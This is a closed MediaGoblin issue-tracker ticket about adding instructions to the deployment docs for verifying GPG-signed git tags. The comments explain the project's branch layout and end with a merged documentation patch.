#787 closed defect (fixed)
Instructions should include a recommendation that users check signatures
Reported by: | anongoblin | Owned by: | |
---|---|---|---|
Priority: | major | Milestone: | 1.0 |
Component: | documentation | Keywords: | |
Cc: | Alex Jordan | Parent Tickets: |
Description
On http://mediagoblin.readthedocs.org/en/v0.5.1/siteadmin/deploying.html , the instructions for deploying mediagoblin itself are:
git clone git://gitorious.org/mediagoblin/mediagoblin.git cd mediagoblin git submodule init && git submodule update
It would probably be a good idea to recommend that users make sure that they're getting the real mediagoblin code, and not a trojan or something. One part of doing that would be to point them at the https URL (see #786), but since tags are signed, it might be a good idea to include instructions for checking signed tags too.
Attachments (2)
Change History (15)
comment:1 by , 11 years ago
Parent Tickets: | → 786 |
---|
comment:2 by , 11 years ago
comment:3 by , 10 years ago
So there are kind of two things here, one of them is to tell users to check the GPG key... good idea! That suggestion should be added to the docs.
Here's my key fingerprint, in case that helps:
Key fingerprint = 510A 8628 E2A7 7678 8F8C 709C 4BC0 2592 5FF8 F4D3
Secondly is updating the docs to check out a specific tag is a good idea... though it may require some rethinking of how the deployment docs are written, particularly on "how to upgrade ot a new version".
comment:5 by , 10 years ago
I do like the idea of being able to verify software installed via pip. I'm entirely unsure how to do this, though.
with regards to anongoblin's initial suggestion that we present users with a way to not install from master, this is fixed in the current docs version. We request that users clone the stable branch:
git clone https://gitorious.org/mediagoblin/mediagoblin.git -b stable
I'll leave this ticket open for now, but would appreciate more direction on what should be checked via the GPG key. I'm comfortable with verifying a single file via GPG, but am not certain what should be verified if someone is pulling-in the entire MediaGoblin stack.
comment:6 by , 9 years ago
Parent Tickets: | 786 |
---|
comment:7 by , 9 years ago
Cc: | added |
---|
jcampbell: I believe anongoblin is suggesting that the Git tag be verified, not an individual file. IIRC you can do this with git tag --verify $tag
.
(The longer explanation is that verifying a Git tag essentially serves to verify the entire source checkout, because if any file in the tree were to be tampered with, that would change the SHA1s of commit and tree objects, which would then not be referenced by the signed tag.)
Of course, that doesn't cover all the stuff that Pip is downloading, but it's a start...
comment:8 by , 9 years ago
Owner: | set to |
---|---|
Status: | new → in_progress |
I just attached a patch. Note that it *does not work yet*. I need someone to explain to me why the origin/master
branch contains work that the v0.9.0
tag does not, and then I can fix the documentation.
Also, I'm assuming that all releases are signed by cwebber. If this isn't the case, that needs to be fixed as well.
comment:9 by , 9 years ago
So, strugee asked why we have the tags and master and stable, so here's clarification:
- origin/master: Contains our latest development code, we're working on it towards the next release
- vX.X.X tag: release with vX.X.X version
- stable: latest release, possibly with a couple of small cleanup commits on top of it (this allows users to have an easy branch to keep their mediagoblin checkout set to, and also allows us to make minor documentation fixes and etc without putting out a full new release)
comment:10 by , 9 years ago
Whoops, I typo'd. I meant origin/stable
, not origin/master
. In any case, you answered my question. Thanks! I'll attach a new patch shortly.
by , 9 years ago
Attachment: | 0001-Document-how-to-verify-git-tag-signatures-v2.patch added |
---|
patch v2
comment:11 by , 9 years ago
Owner: | removed |
---|---|
Status: | in_progress → review |
Aaaaand done! This is ready for review.
comment:12 by , 9 years ago
Resolution: | → fixed |
---|---|
Status: | review → closed |
Looks great! Thanks Strugee! I merged it!
comment:13 by , 9 years ago
Milestone: | → 1.0 |
---|
Probably, the instructions should also include the instructions to check out a tag, so that people following the "v0.5.1" installation instructions don't wind up installing the latest patches on git master.